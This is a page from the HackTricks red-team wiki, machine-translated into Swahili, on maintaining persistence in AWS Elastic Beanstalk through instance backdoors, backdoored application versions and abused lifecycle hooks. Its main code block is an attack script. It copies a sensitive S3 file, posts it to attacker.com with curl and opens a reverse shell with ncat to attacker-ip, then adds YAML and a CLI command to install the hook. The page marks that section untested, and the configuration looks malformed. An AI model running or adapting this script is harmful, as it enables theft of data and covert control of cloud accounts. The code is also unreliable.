AWS - Elastic Beanstalk Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Elastic Beanstalk

Kwa maelezo zaidi angalia:

Persistence in Instance

Ili kudumisha uendelevu ndani ya akaunti ya AWS, mekanismu ya uendelevu inaweza kuanzishwa ndani ya mfano (kazi ya cron, ufunguo wa ssh...) ili mshambuliaji aweze kuipata na kuiba akili za IAM kutoka kwa huduma ya metadata.

Backdoor in Version

Mshambuliaji anaweza kuweka backdoor kwenye msimbo ndani ya repo ya S3 ili kila wakati ifanye backdoor yake na msimbo unaotarajiwa.

New backdoored version

Badala ya kubadilisha msimbo kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lililo na backdoor la programu.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk inatoa mizunguko ya maisha ambayo inakuruhusu kuendesha skripti za kawaida wakati wa upatikanaji na kumalizika kwa mfano. Mshambuliaji anaweza kuweka mzunguko wa maisha ili kwa muda fulani kuendesha skripti inayotoa data au kudumisha ufikiaji wa akaunti ya AWS.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"